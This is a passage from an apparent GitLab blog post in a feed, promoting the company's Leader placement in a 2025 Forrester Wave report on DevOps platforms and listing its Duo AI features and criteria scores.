<p>Forrester scored GitLab a 5 – the highest on their scale – for both the <strong>AI infusion</strong> and <strong>AI risk mitigation</strong> criteria. We’re pleased to see our focus on building innovative AI capabilities that maintain security is being noticed by more than just our customers.</p>
<p>This dual strength shows up across our GitLab Duo AI offerings, including:</p>
<ul>
<li>Duo Workflow (private beta): Autonomous AI agents that handle complex tasks across development, security, and operations — with enterprise-grade guardrails and audit trails.</li>
<li>Agentic Chat: Contextual, conversational AI assistance for everything from code explanations to test creation — with IP protection and privacy controls built in.</li>
<li>Code Suggestions: AI assistance that can predictively complete code blocks, define function logic, generate tests, and propose common code like regex patterns.</li>
<li>AI-native Vulnerability Resolution: Find and fix vulnerabilities with auto explanation and auto-generated merge requests, ensuring a streamlined development process.</li>
</ul>
<h2>Doing more with less</h2>
<p>We’ve heard loud and clear that DevSecOps teams don’t need more tools and integrations that help them with part of their software delivery lifecycle. They need a seamless, integrated developer experience that covers the entire SDLC.</p>
<p>We believe GitLab’s scores in the following criteria are validation of our customer-focused strategy:</p>
<ul>
<li><strong>Day zero experience:</strong> Forrester cited our “strong day zero experience,” noting that “everything is ready to run out-of-the-box,” supported by extensive migration tools and tutorials.</li>
<li><strong>Developer tooling:</strong> Forrester pointed to <a href="https://about.gitlab.com/blog/gitlab-duo-with-amazon-q-agentic-ai-optimized-for-aws/">GitLab Duo with Amazon Q</a>, our agentic AI offering for AWS customers, as well as our cloud development environment, integrated developer platform, and wikis for documentation as examples.</li>
<li><strong>Project planning and alignment:</strong> Forrester noted our &quot;strong compliance center,&quot; and that we have tools to drive alignment top-down and bottom-up.</li>
<li><strong>Pipeline security:</strong> Forrester gave us the highest score possible in the pipeline security criterion.</li>
<li><strong>Build automation and CI:</strong> Forrester cited our build automation and CI with multistage build pipelines and strong self-hosted support.</li>
</ul>
<h2>Read the report</h2>
<p>For us, being named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025 speaks to the breadth and depth of our platform’s capabilities, providing a single source of truth for the entire software development lifecycle. No more juggling multiple tools and integrations – GitLab provides a seamless, integrated experience that boosts productivity and reduces friction. We believe this placement reflects the hard work of our team, the many contributions from GitLab’s open source community, the invaluable feedback from our customers, and our dedication to shaping the future of software development.</p>
<blockquote>
<h4><a href="https://about.gitlab.com/forrester-wave-devops-platform/">Access the report today!</a></h4>
</blockquote>
<p><em>Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. For more information, read about Forrester’s objectivity <a href="https://www.forrester.com/about-us/objectivity/">here</a>.</em></p>
]]></content>
        <author>
            <name>Dave Steer</name>
            <uri>https://about.gitlab.com/blog/authors/dave-steer</uri>
        </author>
        <published>2025-06-02T00:00:00.000Z</published>
    </entry>
</feed>